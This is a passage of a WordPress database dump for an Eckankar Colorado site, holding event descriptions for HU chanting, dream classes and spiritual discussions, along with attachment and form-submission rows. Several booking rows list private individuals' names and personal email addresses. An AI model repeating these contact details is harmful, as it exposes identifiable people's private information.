23:37:02','',0,'https://eckankar-colorado.org/nf_sub/268475/',0,'nf_sub','',0),(268477,15,'2023-05-19 06:58:10','2023-05-19 12:58:10','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Your dreams are real!</strong></span><br>\r\n<span style=\"font-size: 14pt;\">If you understand dreams and how they work, you can use your dreams to guide and help you take steps forward, both spiritually, and in your daily life.</span></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\">Are you interested in techniques to help you remember and interpret your dreams?</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Would you like to understand the spiritual nature of dreams?</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Did you know there are eight types of dreams?</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Everyone is welcome to join the June class. We will begin by briefly summarizing what we learned in the May class about tools and spiritual exercises for better dreaming experiences and will include a handout from the May class if you were unable to attend in May. </span><span style=\"font-size: 14pt;\">Those who are interested can briefly share a dream experience and what they learned from trying a new technique. </span><span style=\"font-size: 14pt;\">We plan to offer more techniques that can help you remember and interpret your dreams and we’ll go over eight types of dreams that you can easily identify as you continue your dream studies.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Again, our goal is that each participant will gain a deeper understanding of their dream worlds from a spiritual perspective.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This free event is sponsored by Eckankar, the Path of Spiritual Freedom as a community service, a spiritual resource for people of all faiths and beliefs. It is an individual, creative practice to experience our own unique relationship with the Divine.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">To read more about the hidden secrets of your dreams:</span><br>\r\n<span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"https://www.eckankar.org/experience/dreams/\" target=\"_blank\" rel=\"nofollow noopener ugc\">Dreams and Their Spiritual Meaning</a></span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/pagosa-springs-spiritual-experiences-group/events/293003244/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Your Source for Everyday Guidance:<br> A Spiritual View of Dreams, Part two<br>In Person Spiritual Discussion','','publish','closed','closed','','your-source-for-everyday-guidance-a-spiritual-view-of-dreams-part-twoin-person-discussion','','','2023-05-19 07:25:11','2023-05-19 13:25:11','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268477',0,'mec-events','',0),(268479,15,'2023-05-19 07:08:56','2023-05-19 13:08:56','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 18pt;\"><strong>Tune into the Sound Current with HU.</strong></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are warmly invited to experience HU, a divine sound that courses through all of life and through every atom of your body. HU is an ancient name for God, a sacred sound and a carrier of love between Soul and God. It has been sung for thousands of years, and in many places, for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">In this in-person event, you will have the opportunity to experience some of the many benefits of singing HU:</span></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge. Find out more about HU at&nbsp;<a class=\"!text-viridian\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What is HU? | HU is the Sound of Soul | ECKANKAR</a>.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-durango/events/293477705/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','15 Minutes to Change Your Life','','publish','closed','closed','','15-minutes-to-change-your-lifetune-into-the-sound-current-with-huin-person-spiritual-discussion','','','2023-06-20 13:31:27','2023-06-20 19:31:27','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268479',0,'mec-events','',0),(268480,15,'2023-05-19 07:07:33','2023-05-19 13:07:33','','HU_Heart','','inherit','closed','closed','','hu_heart','','','2023-05-19 07:07:33','2023-05-19 13:07:33','',268479,'https://eckankar-colorado.org/wp-content/uploads/2023/05/HU_Heart.webp',0,'attachment','image/webp',0),(268481,15,'2023-05-19 07:12:33','2023-05-19 13:12:33','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Do you have natural talents and wonder where they came from?</span><br>\r\n<span style=\"font-size: 14pt;\">Can Understanding your dreams enhance your spiritual growth?</span><br>\r\n<span style=\"font-size: 14pt;\">Have you had a profound out-of-body experience that revealed higher dimensions of existence, truth, and divine love?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Join us for a discussion of how past lives, dreams, and soul travel help you find God.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-durango/events/293477544/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Ancient Wisdom for Today<br>In Person Spiritual Discussion','','publish','closed','closed','','ancient-wisdom-for-todayin-person-spiritual-discussion','','','2023-05-19 07:12:33','2023-05-19 13:12:33','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268481',0,'mec-events','',0),(268482,15,'2023-05-19 07:18:31','2023-05-19 13:18:31','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\">Would you like to get a higher perspective on life\'s challenges?</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Do you wonder why your life has so many seeming obstacles?</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Are you ready to learn what life is teaching you through your problems?</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">If you’re ready to explore a new way of looking at your challenges, then this Meetup is for you.</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Harold Klemp says in his book <em>The Wonder Within You</em>, \"Look at the obstacles in your life that you think are stumbling blocks - things that are holding you back. Now imagine the blocks becoming stepping-stones taking you higher. Where are they leading you? What are you learning about yourself?\"</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU chant, a love song to God, and be able to speak with other like-hearted spiritual seekers in a low-key, no pressure setting. Please come and explore your own answers with open hearts, eyes and ears.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Welcome to All.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><em><strong>The ECK Light &amp; Sound Service will be held in person at the ECK Temple of Colorado, 7100 West Mississippi Avenue in Lakewood Colorado and will be broadcast live simultaneously on Zoom.</strong></em>&nbsp;Please RSVP to get the Zoom link.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Problems or Spiritual Lessons? - ECK Light and Sound Service - In Person & Online','','publish','closed','closed','','problems-or-spiritual-lessonseck-light-and-sound-service-in-person-online','','','2023-06-21 21:17:04','2023-06-22 03:17:04','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268482',0,'mec-events','',0),(268483,15,'2023-05-19 07:17:08','2023-05-19 13:17:08','','MountainStream','','inherit','closed','closed','','mountainstream','','','2023-05-19 07:17:08','2023-05-19 13:17:08','',268482,'https://eckankar-colorado.org/wp-content/uploads/2023/05/MountainStream.webp',0,'attachment','image/webp',0),(268484,15,'2023-05-19 07:23:40','2023-05-19 13:23:40','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are warmly invited to experience HU, a divine sound that courses through all of life and through every atom of your body. HU is an ancient name for God, a sacred sound and a carrier of love between Soul and God. It has been sung for thousands of years, and in many places, for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">In this event, you will have the opportunity to experience some of the many benefits of singing HU:</span></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">We will chant HU for 15 to 20 minutes, have a few minutes of quiet contemplation followed by spiritual conversation with others of like heart.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Find out more about HU at&nbsp;<a class=\"!text-viridian\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What is HU? | HU is the Sound of Soul | ECKANKAR</a>.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofdenver/events/293602684/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Awaken to Higher Consciousness','','publish','closed','closed','','awaken-to-higher-consciousnesstune-into-the-voice-of-god-through-huin-person-spiritual-discussion','','','2023-06-21 21:38:51','2023-06-22 03:38:51','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268484',0,'mec-events','',0),(268485,15,'2023-05-19 07:22:33','2023-05-19 13:22:33','','HUFlowers','','inherit','closed','closed','','huflowers','','','2023-05-19 07:22:33','2023-05-19 13:22:33','',268484,'https://eckankar-colorado.org/wp-content/uploads/2023/05/HUFlowers.webp',0,'attachment','image/webp',0),(268532,1000081,'2023-06-11 10:30:00','2023-06-11 16:30:00','','Eileen Joy - eileenjoy12@gmail.com','','publish','closed','closed','','eileen-joy-eileenjoy12gmail-com-6','','','2023-06-11 10:30:00','2023-06-11 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268532',0,'mec-books','',0),(268516,2,'2023-05-25 12:21:59','2023-05-25 18:21:59','','mountain-stream-3','','inherit','closed','closed','','mountain-stream-3','','','2023-05-25 12:21:59','2023-05-25 18:21:59','',125419,'https://eckankar-colorado.org/wp-content/uploads/2022/03/mountain-stream-3.jpg',0,'attachment','image/jpeg',0),(268518,2,'2023-05-25 14:04:14','2023-05-25 20:04:14','','mountain-stream-4op','','inherit','closed','closed','','mountain-stream-4op','','','2023-05-25 14:04:14','2023-05-25 20:04:14','',125419,'https://eckankar-colorado.org/wp-content/uploads/2022/03/mountain-stream-4op.jpg',0,'attachment','image/jpeg',0),(268520,2,'2023-05-25 14:07:00','2023-05-25 20:07:00','','mountain-stream-5op','','inherit','closed','closed','','mountain-stream-5op','','','2023-05-25 14:07:00','2023-05-25 20:07:00','',125419,'https://eckankar-colorado.org/wp-content/uploads/2022/03/mountain-stream-5op.jpg',0,'attachment','image/jpeg',0),(269202,0,'2023-10-12 17:37:49','2023-10-12 23:37:49','','','','publish','closed','closed','','269202','','','2023-10-12 17:37:49','2023-10-12 23:37:49','',0,'https://eckankar-colorado.org/nf_sub/269202/',0,'nf_sub','',0),(268530,15,'2023-05-26 08:04:34','2023-05-26 14:04:34','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 16pt;\"><strong>-This Book Discussion Is Open To The Public-</strong></span></p>\r\n<p class=\"\"><span class=\"\" style=\"font-size: 14pt;\">Have you lived before? Why are past lives significant? Are your dreams real experiences? Where do you go when you close your eyes? These are just some of the questions we\'ll explore in a book discussion class. There will be a total of 6 classes that meet monthly and this next class will focus on past lives.</span><br>\r\n<span class=\"\" style=\"font-size: 14pt;\">Classes are free and books will be provided. You do NOT have to read the books prior to class and you may attend all 6 classes or drop in when you can. If you have any questions or would like more info., please message me here on meetup.</span><br>\r\n<span style=\"font-size: 14pt;\">Looking forward to seeing you on the 17th!</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-of-loveland/events/293703788/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','\'Past Lives, Dreams and Soul Travel\'<br>Book Discussion - In Person','','draft','closed','closed','','past-lives-dreams-and-soul-travelbook-discussion-in-person-2','','','2023-10-28 21:27:29','2023-10-29 03:27:29','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268530',0,'mec-events','',0),(268531,15,'2023-05-26 08:10:45','2023-05-26 14:10:45','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You\'re invited to experience chanting HU, a love song to God, contemplative time, and spiritual conversation with others of like heart.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">A divine sound courses through all life - through every blade of grass, every galaxy, every atom of our bodies. HU is an ancient, sacred name for God - a carrier of love between Soul and God. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. It is the clear Voice of God, with the power to transform the lead of the human consciousness into the gold of an enlightened Soul.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Find your own proof of the love and power of HU.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar, the Path of Spiritual Freedom as a community service.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">For more information about HU, check out&nbsp;<a class=\"!text-viridian\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What is HU? | HU is the Sound of Soul | ECKANKAR</a>.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">There is never a charge for this Meetup.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-of-loveland/events/293663010/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Awaken to Higher Consciousness','','publish','closed','closed','','awaken-to-higher-consciousnessexperience-the-sound-of-soul-huin-person-spiritual-discussion','','','2023-06-21 21:14:27','2023-06-22 03:14:27','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268531',0,'mec-events','',0),(268598,0,'2023-06-03 16:50:00','2023-06-03 22:50:00','','','','publish','closed','closed','','268598','','','2023-06-03 16:50:00','2023-06-03 22:50:00','',0,'https://eckankar-colorado.org/nf_sub/268598/',0,'nf_sub','',0),(268745,2,'2023-06-30 13:23:07','2023-06-30 19:23:07','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">— This event is for members of ECKANKAR in Colorado and Utah —</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">We are inviting all chelas to join us for a Zoom discussion of the June 2023 edition of the Mystic&nbsp; World. Please have your copies of both issues on hand at the meeting.</span><span style=\"font-size: 14pt;\"> <br>\r\n</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Note that the Mystic World is available online at the beginning of the month at <a href=\"https://www.eckankar.org/\" target=\"_blank\" rel=\"noopener\">Eckankar.org,</a> in the Members Area under \"Your Spiritual Studies.</span></p>\r\n<p class=\"\"><strong><span style=\"font-size: 14pt; color: #1d5791;\">You can find the login information for this event in the current issue of the Members Newsletter.</span></strong></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Mystic World Discussion','','publish','closed','closed','','mystic-world-discussion-online-template','','','2023-06-30 13:37:41','2023-06-30 19:37:41','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268745',0,'mec-events','',0),(268540,0,'2023-05-27 15:06:53','2023-05-27 21:06:53','','','','publish','closed','closed','','268540','','','2023-05-27 15:06:53','2023-05-27 21:06:53','',0,'https://eckankar-colorado.org/nf_sub/268540/',0,'nf_sub','',0),(268736,2,'2023-06-30 10:11:09','2023-06-30 16:11:09','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"color: #ad7f14; font-size: 18pt; font-weight: 600;\" data-font-weight=\"600\">Soul Travel: Adventures in Higher Consciousness.</p>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #ad7f14; margin-top: -15px; margin-left: 20px;\">\r\n<p><span style=\"font-size: 14pt;\">“Whenever Soul reaches the far orbits of the inner planes through Soul Travel, the human heart opens to God\'s all consuming love.</span></p>\r\n<p><span style=\"font-size: 14pt;\">“It is our very purpose to discover that love.”</span><br>\r\n<span style=\"font-size: 12pt; color: #666666;\">— Harold Klemp, <em>Past Lives, Dreams, and Soul Travel</em>, p. 164<br>\r\n</span></p>\r\n</blockquote>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Four dynamic workshops will be offered Saturday and Sunday. Register for one or more workshops and experience the wonder within you! Tap into your inner worlds to get insights into daily challenges and a deeper understanding of the workings of everyday life. The Youth Program will provide inspiring and fun programs for teens and kids.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><strong>Guest Speakers:</strong> Jane and Stan Burgess</span><br>\r\n<span style=\"font-size: 14pt;\">Jane and Stan engage listeners around the world in discovering and deepening their own spiritual connections. They enjoy how the ECK, Divine Love, touches all life. This inspires their involvement with family, work, art, and nature. Both serve as Eckankar clergy and work at the ECKANKAR Spiritual Center in Minnesota.</span></p>\r\n<p class=\"\" style=\"color: #ad7f14; font-size: 15pt; font-weight: 600;\" data-font-weight=\"600\">For registration and complete program information, please use the following link:<br>\r\n<a href=\"https://eckankarcolorado.regfox.com/2023-regional-soul-adventure-seminar\" target=\"_blank\" rel=\"noopener\">Regional Seminar Registration</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','2023 Regional Soul Adventure Seminar','','publish','closed','closed','','2023-regional-soul-adventure-seminar','','','2023-08-04 11:19:15','2023-08-04 17:19:15','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268736',0,'mec-events','',0),(268904,15,'2023-08-17 20:29:38','2023-08-18 02:29:38','<div class=\"boldgrid-section\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/08/creamy-blue-bk.jpg\" style=\"background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/08/creamy-blue-bk.jpg\'); background-size: cover; background-repeat: no-repeat; background-position: 50% 50%;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 77px; padding-bottom: 31px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\">[fluentform id=\"5\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Colorado Statewide Leadership Contacts','','publish','closed','closed','','colorado-statewide-leadership-contacts','','','2023-08-19 08:29:21','2023-08-19 14:29:21','',79666,'https://eckankar-colorado.org/?page_id=268904',0,'page','',0),(268884,0,'2023-08-08 11:09:05','2023-08-08 17:09:05','','','','publish','closed','closed','','268884','','','2023-08-08 11:09:05','2023-08-08 17:09:05','',0,'https://eckankar-colorado.org/nf_sub/268884/',0,'nf_sub','',0),(268885,0,'2023-08-08 19:09:18','2023-08-09 01:09:18','','','','publish','closed','closed','','268885','','','2023-08-08 19:09:18','2023-08-09 01:09:18','',0,'https://eckankar-colorado.org/nf_sub/268885/',0,'nf_sub','',0),(268887,1000091,'2023-08-13 10:30:00','2023-08-13 16:30:00','','Marlene Chapelle - marlenechapelle88@gmail.com','','publish','closed','closed','','marlene-chapelle-marlenechapelle88gmail-com','','','2023-08-13 10:30:00','2023-08-13 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268887',0,'mec-books','',0),(268735,0,'2023-06-29 22:58:49','2023-06-30 04:58:49','','','','publish','closed','closed','','268735','','','2023-06-29 22:58:49','2023-06-30 04:58:49','',0,'https://eckankar-colorado.org/nf_sub/268735/',0,'nf_sub','',0),(268968,0,'2023-09-02 16:40:32','2023-09-02 22:40:32','','','','publish','closed','closed','','268968','','','2023-09-02 16:40:32','2023-09-02 22:40:32','',0,'https://eckankar-colorado.org/nf_sub/268968/',0,'nf_sub','',0),(268730,2,'2023-08-26 11:55:09','2023-08-26 17:55:09','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 18pt;\">Are you ready to go to the next level spiritually?</span></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Would you like to be free of patterns and beliefs that no longer serve you?</strong></span></p>\r\n</li>\r\n	<li>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Are you looking for a new perspective on your life?</strong></span></p>\r\n</li>\r\n	<li>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Are you ready to step into a new state of consciousness and be more fully alive?</strong></span></p>\r\n</li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">If you answered yes to any of these questions, then this is for you. You will hear inspiring spiritual stories, experience the HU chant, a love song to God, and be able to speak with other like-hearted spiritual seekers in a low-key, no pressure setting. Please come and explore your own answers with open hearts, eyes and ears.</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">\"As we face ourselves, we begin to recognize that a certain thing that has held us back from the next step on the path to God. Finally we realize we don\'t need that particular problem anymore. Its the recognition and the realization of it which allows the karma to be burned off. This realization, or expansion of consciousness, comes through doing the spiritual exercises and singing the name of God.\"</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">― Harold Klemp,&nbsp;<em>The Cloak of Consciousness, Mahanta Transcripts Book 5, p. 75</em></span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Welcome to All.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><em><strong>The ECK Light &amp; Sound Service will be held in person at the ECK Temple of Colorado, 7100 West Mississippi Avenue in Lakewood Colorado and will be broadcast live simultaneously on Zoom.</strong></em>&nbsp;<strong>Please RSVP to get the Zoom link</strong>.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by&nbsp;<a class=\"!text-viridian\" href=\"http://www.eckankar-colorado.org/\" target=\"_blank\" rel=\"nofollow noopener ugc\">Eckankar </a>as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Good Karma, Bad Karma, Beyond Karma','','publish','closed','closed','','good-karma-bad-karma-beyond-karma','','','2023-08-27 10:01:08','2023-08-27 16:01:08','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268730',0,'mec-events','',0),(268726,2,'2023-06-28 12:12:01','2023-06-28 18:12:01','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">— This event is only for members of ECKANKAR in Colorado and Utah —</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">We are inviting all chelas to join us for a Zoom discussion of the March 2022 edition of \'<em>The Mystic&nbsp;</em> <em>World</em>.\'</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Please have your copy of this issue on hand at the meeting.&nbsp;&nbsp;</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\"></div>\r\n</div>\r\n</div>\r\n</div>','MEC REGISTRATION - TICKET TEST-6-28-2023--','','draft','closed','closed','','mec-registration-ticket-test-6-28-2023','','','2023-06-28 21:14:50','2023-06-29 03:14:50','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268726',0,'mec-events','',0),(268561,2,'2023-05-27 21:53:28','2023-05-28 03:53:28','','blue-mountain-stream-9','','inherit','closed','closed','','blue-mountain-stream-9','','','2023-05-27 21:53:28','2023-05-28 03:53:28','',125419,'https://eckankar-colorado.org/wp-content/uploads/2022/03/blue-mountain-stream-9.jpg',0,'attachment','image/jpeg',0),(268782,1000077,'2023-07-09 10:30:00','2023-07-09 16:30:00','','Gerald and Johanna van Gogh - gvg1328@telus.net','','publish','closed','closed','','gerald-and-johanna-van-gogh-gvg1328telus-net','','','2023-07-09 10:30:00','2023-07-09 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268782',0,'mec-books','',0),(268860,2,'2023-07-30 12:13:16','2023-07-30 18:13:16','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\" style=\"color: #c88b08;\"><strong><span style=\"font-size: 20pt;\">Let\'s Talk About How To Balance Our Lives. <br>\r\n</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Spiritual discussions are forums that dive deep into spiritual topics. You’ll be able to share your spiritual experiences, perspectives, or questions. If you prefer to listen and learn, that’s cool too!</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">People of all faiths and backgrounds are welcome. There’s no need to register—just drop in.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Explore this spiritual topic with other participants in a lively discussion led by an ECK Spiritual Aide (ESA), a specially trained member of the ECK clergy.<br>\r\n</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\"> In person at the ECK Temple of Colorado</span><br>\r\n<br>\r\n<span style=\"font-size: 14pt;\">Preceded by a HU Song from 9:45 - 10:10 a.m.</span><br>\r\n<br>\r\n<span style=\"font-size: 14pt;\">All are welcome!<br>\r\n</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Spiritual Balance in Challenging Times','','publish','open','closed','','spiritual-balance-in-challenging-times-2','','','2023-07-31 10:19:57','2023-07-31 16:19:57','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268860',0,'mec-events','',0),(268564,0,'2023-05-28 01:12:29','2023-05-28 07:12:29','','','','publish','closed','closed','','268564','','','2023-05-28 01:12:29','2023-05-28 07:12:29','',0,'https://eckankar-colorado.org/nf_sub/268564/',0,'nf_sub','',0),(268565,2,'2023-05-28 20:51:58','2023-05-29 02:51:58','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">The Colorado Springs ECK Center will be live-streaming the May 14th \'ECK Light and Sound Service\'. The program will be shown on a large TV for all to enjoy. </span><span style=\"font-size: 16pt;\">You are warmly invited to join us for this in person event.</span></strong></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\">Would you like to get a higher perspective on life\'s challenges?</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Do you wonder 